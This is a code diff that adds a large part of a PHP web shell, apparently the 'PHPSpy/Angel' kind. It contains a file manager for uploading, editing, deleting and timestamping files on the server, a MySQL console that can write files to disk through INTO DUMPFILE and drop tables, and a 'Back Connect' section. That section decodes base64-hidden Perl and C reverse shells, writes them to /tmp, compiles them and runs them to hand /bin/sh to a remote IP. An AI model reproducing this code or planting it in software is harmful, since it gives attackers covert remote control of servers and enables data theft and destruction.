+	if (view_writable) {
+		$('godir').view_writable.value=1;
+	}
+	$('godir').dir.value=dir;
+	$('godir').submit();
+}
+</script>
+  <?php
+	tbhead();
+	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
+	p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');
+	p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
+	if ($view_writable) {
+		p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
+	} else {
+		p(' | <a href="javascript:godir(\''.$nowpath.'\',\'1\');">View Writable</a>');
+	}
+	p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
+	if (IS_WIN && IS_COM) {
+		$obj = new COM('scripting.filesystemobject');
+		if ($obj && is_object($obj)) {
+			$DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
+			foreach($obj->Drives as $drive) {
+				if ($drive->DriveType == 2) {
+					p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).'&#13;Free:'.sizecount($drive->FreeSpace).'&#13;Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
+				} else {
+					p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
+				}
+			}
+		}
+	}
+
+	p('</td></tr></form>');
+
+	p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
+
+	//�鿴���п�д�ļ���Ŀ¼
+	$dirdata=array();
+	$filedata=array();
+
+	if ($view_writable) {
+		$dirdata = GetList($nowpath);
+	} else {
+		// Ŀ¼�б�
+		$dirs=@opendir($dir);
+		while ($file=@readdir($dirs)) {
+			$filepath=$nowpath.$file;
+			if(@is_dir($filepath)){
+				$dirdb['filename']=$file;
+				$dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$dirdb['dirchmod']=getChmod($filepath);
+				$dirdb['dirperm']=getPerms($filepath);
+				$dirdb['fileowner']=getUser($filepath);
+				$dirdb['dirlink']=$nowpath;
+				$dirdb['server_link']=$filepath;
+				$dirdb['client_link']=ue($filepath);
+				$dirdata[]=$dirdb;
+			} else {		
+				$filedb['filename']=$file;
+				$filedb['size']=sizecount(@filesize($filepath));
+				$filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$filedb['filechmod']=getChmod($filepath);
+				$filedb['fileperm']=getPerms($filepath);
+				$filedb['fileowner']=getUser($filepath);
+				$filedb['dirlink']=$nowpath;
+				$filedb['server_link']=$filepath;
+				$filedb['client_link']=ue($filepath);
+				$filedata[]=$filedb;
+			}
+		}// while
+		unset($dirdb);
+		unset($filedb);
+		@closedir($dirs);
+	}
+	@sort($dirdata);
+	@sort($filedata);
+	$dir_i = '0';
+	foreach($dirdata as $key => $dirdb){
+		if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
+			p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
+			p('<td nowrap>'.$dirdb['mtime'].'</td>');
+			p('<td nowrap>--</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
+			p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete '.$dirdb['filename'].'? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
+			p('</tr>');
+			$dir_i++;
+		} else {
+			if($dirdb['filename']=='..') {
+				p('<tr class='.bg().'>');
+				p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
+				p('</tr>');
+			}
+		}
+	}
+
+	p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
+	p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
+	makehide('action','file');
+	makehide('thefile');
+	makehide('doing');
+	makehide('dir',$nowpath);
+	$file_i = '0';
+	foreach($filedata as $key => $filedb){
+		if($filedb['filename']!='..' && $filedb['filename']!='.') {
+			$fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
+			p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
+			p('<td nowrap>'.$filedb['mtime'].'</td>');
+			p('<td nowrap>'.$filedb['size'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
+			p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
+			p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
+			p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');
+			p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Time</a>');
+			p('</td></tr>');
+			$file_i++;
+		}
+	}
+	p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
+	p('</form></table>');
+}// end dir
+
+elseif ($action == 'sqlfile') {
+	if($doing=="mysqlupload"){
+		$file = $_FILES['uploadfile'];
+		$filename = $file['tmp_name'];
+		if (file_exists($savepath)) {
+			m('The goal file has already existed');
+		} else {
+			if(!$filename) {
+				m('Please choose a file');
+			} else {
+				$fp=@fopen($filename,'r');
+				$contents=@fread($fp, filesize($filename));
+				@fclose($fp);
+				$contents = bin2hex($contents);
+				if(!$upname) $upname = $file['name'];
+				dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+				$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
+				m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
+			}
+		}
+	}
+?>
+<script type="text/javascript">
+function mysqlfile(doing){
+	if(!doing) return;
+	$('doing').value=doing;
+	$('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
+	$('mysqlfile').dbport.value=$('dbinfo').dbport.value;
+	$('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
+	$('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
+	$('mysqlfile').dbname.value=$('dbinfo').dbname.value;
+	$('mysqlfile').charset.value=$('dbinfo').charset.value;
+	$('mysqlfile').submit();
+}
+</script>
+<?php
+	!$dbhost && $dbhost = 'localhost';
+	!$dbuser && $dbuser = 'root';
+	!$dbport && $dbport = '3306';
+	$charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
+	formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
+	makehide('action','sqlfile');
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p(':');
+	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	p('DBName:');
+	makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
+	p('DBCharset:');
+	makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
+	p('</p>');
+	formfoot();
+	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
+	p('<h2>Upload file</h2>');
+	p('<p><b>This operation the DB user must has FILE privilege</b></p>');
+	p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
+	p('<h2>Download file</h2>');
+	p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
+	makehide('dbhost');
+	makehide('dbport');
+	makehide('dbuser');
+	makehide('dbpass');
+	makehide('dbname');
+	makehide('charset');
+	makehide('doing');
+	makehide('action','sqlfile');
+	p('</form>');
+}
+
+elseif ($action == 'sqladmin') {
+	!$dbhost && $dbhost = 'localhost';
+	!$dbuser && $dbuser = 'root';
+	!$dbport && $dbport = '3306';
+	$dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
+	if(isset($dbhost)){
+		$dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
+	}
+	if(isset($dbuser)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
+	}
+	if(isset($dbpass)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
+	}
+	if(isset($dbport)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
+	}
+	if(isset($dbname)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
+	}
+	if(isset($charset)) {
+		$dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
+	}
+
+	if ($doing == 'backupmysql' && $saveasfile) {
+		if (!$table) {
+			m('Please choose the table');
+		} else {
+			dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			$table = array_flip($table);
+			$fp = @fopen($path,'w');
+			if ($fp) {
+				$result = q('SHOW tables');
+				if (!$result) p('<h2>'.mysql_error().'</h2>');
+				$mysqldata = '';
+				while ($currow = mysql_fetch_array($result)) {
+					if (isset($table[$currow[0]])) {
+						sqldumptable($currow[0], $fp);
+					}
+				}
+				fclose($fp);
+				$fileurl = str_replace(SA_ROOT,'',$path);
+				m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
+				mysql_close();
+			} else {
+				m('Backup failed');
+			}
+		}
+	}
+	if ($insert && $insertsql) {
+		$keystr = $valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			if ($val) {
+				$keystr .= $tmp.$key;
+				$valstr .= $tmp."'".addslashes($val)."'";
+				$tmp = ',';
+			}
+		}
+		if ($keystr && $valstr) {
+			dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
+		}
+	}
+	if ($update && $insertsql && $base64) {
+		$valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			$valstr .= $tmp.$key."='".addslashes($val)."'";
+			$tmp = ',';
+		}
+		if ($valstr) {
+			$where = base64_decode($base64);
+			dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
+		}
+	}
+	if ($doing == 'del' && $base64) {
+		$where = base64_decode($base64);
+		$delete_sql = "DELETE FROM $tablename WHERE $where";
+		dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+		m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
+	}
+
+	if ($tablename && $doing == 'drop') {
+		dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+		if (q("DROP TABLE $tablename")) {
+			m('Drop table of success');
+			$tablename = '';
+		} else {
+			m(mysql_error());
+		}
+	}
+
+	$charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
+
+	formhead(array('title'=>'MYSQL Manager'));
+	makehide('action','sqladmin');
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p(':');
+	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	p('DBCharset:');
+	makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
+	makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+?>
+<script type="text/javascript">
+function editrecord(action, base64, tablename){
+	if (action == 'del') {		
+		if (!confirm('Is or isn\'t deletion record?')) return;
+	}
+	$('recordlist').doing.value=action;
+	$('recordlist').base64.value=base64;
+	$('recordlist').tablename.value=tablename;
+	$('recordlist').submit();
+}
+function moddbname(dbname) {
+	if(!dbname) return;
+	$('setdbname').dbname.value=dbname;
+	$('setdbname').submit();
+}
+function settable(tablename,doing,page) {
+	if(!tablename) return;
+	if (doing) {
+		$('settable').doing.value=doing;
+	}
+	if (page) {
+		$('settable').page.value=page;
+	}
+	$('settable').tablename.value=tablename;
+	$('settable').submit();
+}
+</script>
+<?php
+	//������¼
+	formhead(array('name'=>'recordlist'));
+	makehide('doing');
+	makehide('action','sqladmin');
+	makehide('base64');
+	makehide('tablename');
+	p($dbform);
+	formfoot();
+
+	//ѡ�����ݿ�
+	formhead(array('name'=>'setdbname'));
+	makehide('action','sqladmin');
+	p($dbform);
+	if (!$dbname) {
+		makehide('dbname');
+	}
+	formfoot();
+
+	//ѡ����
+	formhead(array('name'=>'settable'));
+	makehide('action','sqladmin');
+	p($dbform);
+	makehide('tablename');
+	makehide('page',$page);
+	makehide('doing');
+	formfoot();
+
+	$cachetables = array();	
+	$pagenum = 30;
+	$page = intval($page);
+	if($page) {
+		$start_limit = ($page - 1) * $pagenum;
+	} else {
+		$start_limit = 0;
+		$page = 1;
+	}
+	if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
+		dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		//��ȡ���ݿ���Ϣ
+		$mysqlver = mysql_get_server_info();
+		p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
+		$highver = $mysqlver > '4.1' ? 1 : 0;
+
+		//��ȡ���ݿ�
+		$query = q("SHOW DATABASES");
+		$dbs = array();
+		$dbs[] = '-- Select a database --';
+		while($db = mysql_fetch_array($query)) {
+			$dbs[$db['Database']] = $db['Database'];
+		}
+		makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
+		$tabledb = array();
+		if ($dbname) {
+			p('<p>');
+			p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
+			if ($tablename) {
+				p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
+			}
+			p('</p>');
+			mysql_select_db($dbname);
+
+			$getnumsql = '';
+			$runquery = 0;
+			if ($sql_query) {
+				$runquery = 1;
+			}
+			$allowedit = 0;
+			if ($tablename && !$sql_query) {
+				$sql_query = "SELECT * FROM $tablename";
+				$getnumsql = $sql_query;
+				$sql_query = $sql_query." LIMIT $start_limit, $pagenum";
+				$allowedit = 1;
+			}
+			p('<form action="'.$self.'" method="POST">');
+			p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
+			makehide('tablename', $tablename);
+			makehide('action','sqladmin');
+			p($dbform);
+			p('</form>');
+			if ($tablename || ($runquery && $sql_query)) {
+				if ($doing == 'structure') {
+					$result = q("SHOW COLUMNS FROM $tablename");
+					$rowdb = array();
+					while($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					p('<tr class="head">');
+					p('<td>Field</td>');
+					p('<td>Type</td>');
+					p('<td>Null</td>');
+					p('<td>Key</td>');
+					p('<td>Default</td>');
+					p('<td>Extra</td>');
+					p('</tr>');
+					foreach ($rowdb as $row) {
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						p('<td>'.$row['Field'].'</td>');
+						p('<td>'.$row['Type'].'</td>');
+						p('<td>'.$row['Null'].'&nbsp;</td>');
+						p('<td>'.$row['Key'].'&nbsp;</td>');
+						p('<td>'.$row['Default'].'&nbsp;</td>');
+						p('<td>'.$row['Extra'].'&nbsp;</td>');
+						p('</tr>');
+					}
+					tbfoot();
+				} elseif ($doing == 'insert' || $doing == 'edit') {
+					$result = q('SHOW COLUMNS FROM '.$tablename);
+					while ($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					$rs = array();
+					if ($doing == 'insert') {
+						p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
+					} else {
+						p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
+						$where = base64_decode($base64);
+						$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
+						$rs = mysql_fetch_array($result);
+					}
+					p('<form method="post" action="'.$self.'">');
+					p($dbform);
+					makehide('action','sqladmin');
+					makehide('tablename',$tablename);
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					foreach ($rowdb as $row) {
+						if ($rs[$row['Field']]) {
+							$value = htmlspecialchars($rs[$row['Field']]);
+						} else {
+							$value = '';
+						}
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
+					}
+					if ($doing == 'insert') {
+						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
+					} else {
+						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
+						makehide('base64', $base64);
+					}
+					p('</table></form>');
+				} else {
+					$querys = @explode(';',$sql_query);
+					foreach($querys as $num=>$query) {
+						if ($query) {
+							p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
+							switch(qy($query))
+							{
+								case 0:
+									p('<h2>Error : '.mysql_error().'</h2>');
+									break;	
+								case 1:
+									if (strtolower(substr($query,0,13)) == 'select * from') {
+										$allowedit = 1;
+									}
+									if ($getnumsql) {
+										$tatol = mysql_num_rows(q($getnumsql));
+										$multipage = multi($tatol, $pagenum, $page, $tablename);
+									}
+									if (!$tablename) {
+										$sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
+										$sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
+										preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
+										$tablename = $matches[1][0];
+									}
+									$result = q($query);
+									p($multipage);
+									p('<table border="0" cellpadding="3" cellspacing="0">');
+									p('<tr class="head">');
+									if ($allowedit) p('<td>Action</td>');
+									$fieldnum = @mysql_num_fields($result);
+									for($i=0;$i<$fieldnum;$i++){
+										$name = @mysql_field_name($result, $i);
+										$type = @mysql_field_type($result, $i);
+										$len = @mysql_field_len($result, $i);
+										p("<td nowrap>$name<br><span>$type($len)</span></td>");
+									}
+									p('</tr>');
+									while($mn = @mysql_fetch_assoc($result)){
+										$thisbg = bg();
+										p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+										$where = $tmp = $b1 = '';
+										foreach($mn as $key=>$inside){
+											if ($inside) {
+												$where .= $tmp.$key."='".addslashes($inside)."'";
+												$tmp = ' AND ';
+											}
+											$b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
+										}
+										$where = base64_encode($where);
+										if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
+										p($b1);
+										p('</tr>');
+										unset($b1);
+									}
+									tbfoot();
+									p($multipage);
+									break;	
+								case 2:
+									$ar = mysql_affected_rows();
+									p('<h2>affected rows : <b>'.$ar.'</b></h2>');
+									break;
+							}
+						}
+					}
+				}
+			} else {
+				$query = q("SHOW TABLE STATUS");
+				$table_num = $table_rows = $data_size = 0;
+				$tabledb = array();
+				while($table = mysql_fetch_array($query)) {
+					$data_size = $data_size + $table['Data_length'];
+					$table_rows = $table_rows + $table['Rows'];
+					$table['Data_length'] = sizecount($table['Data_length']);
+					$table_num++;
+					$tabledb[] = $table;
+				}
+				$data_size = sizecount($data_size);
+				unset($table);
+				p('<table border="0" cellpadding="0" cellspacing="0">');
+				p('<form action="'.$self.'" method="POST">');
+				makehide('action','sqladmin');
+				p($dbform);
+				p('<tr class="head">');
+				p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
+				p('<td>Name</td>');
+				p('<td>Rows</td>');
+				p('<td>Data_length</td>');
+				p('<td>Create_time</td>');
+				p('<td>Update_time</td>');
+				if ($highver) {
+					p('<td>Engine</td>');
+					p('<td>Collation</td>');
+				}
+				p('</tr>');
+				foreach ($tabledb as $key => $table) {
+					$thisbg = bg();
+					p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+					p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
+					p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a> ]</td>');
+					p('<td>'.$table['Rows'].'</td>');
+					p('<td>'.$table['Data_length'].'</td>');
+					p('<td>'.$table['Create_time'].'</td>');
+					p('<td>'.$table['Update_time'].'</td>');
+					if ($highver) {
+						p('<td>'.$table['Engine'].'</td>');
+						p('<td>'.$table['Collation'].'</td>');
+					}
+					p('</tr>');
+				}
+				p('<tr class='.bg().'>');
+				p('<td>&nbsp;</td>');
+				p('<td>Total tables: '.$table_num.'</td>');
+				p('<td>'.$table_rows.'</td>');
+				p('<td>'.$data_size.'</td>');
+				p('<td colspan="'.($highver ? 4 : 2).'">&nbsp;</td>');
+				p('</tr>');
+
+				p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
+				makehide('doing','backupmysql');
+				formfoot();
+				p("</table>");
+				fr($query);
+			}
+		}
+	}
+	tbfoot();
+	@mysql_close();
+}//end sql backup
+
+
+elseif ($action == 'backconnect') {
+	!$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
+	!$yourport && $yourport = '12345';
+	$usedb = array('perl'=>'perl','c'=>'c');
+
+	$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
+		"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
+		"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
+		"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
+		"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
+		"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
+		"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+	$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
+		"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
+		"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
+		"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
+		"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
+		"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
+		"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
+		"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+	if ($start && $yourip && $yourport && $use){
+		if ($use == 'perl') {
+			cf('/tmp/angel_bc',$back_connect);
+			$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
+		} else {
+			cf('/tmp/angel_bc.c',$back_connect_c);
+			$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
+			@unlink('/tmp/angel_bc.c');
+			$res = execute("/tmp/angel_bc $yourip $yourport &");
+		}
+		m("Now script try connect to $yourip port $yourport ...");
+	}
+
+	formhead(array('title'=>'Back Connect'));
+	makehide('action','backconnect');
+	p('<p>');
+	p('Your IP:');
+	makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
+	p('Your Port:');
+	makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
+	p('Use:');
+	makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
+	makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+}//end sql backup
+
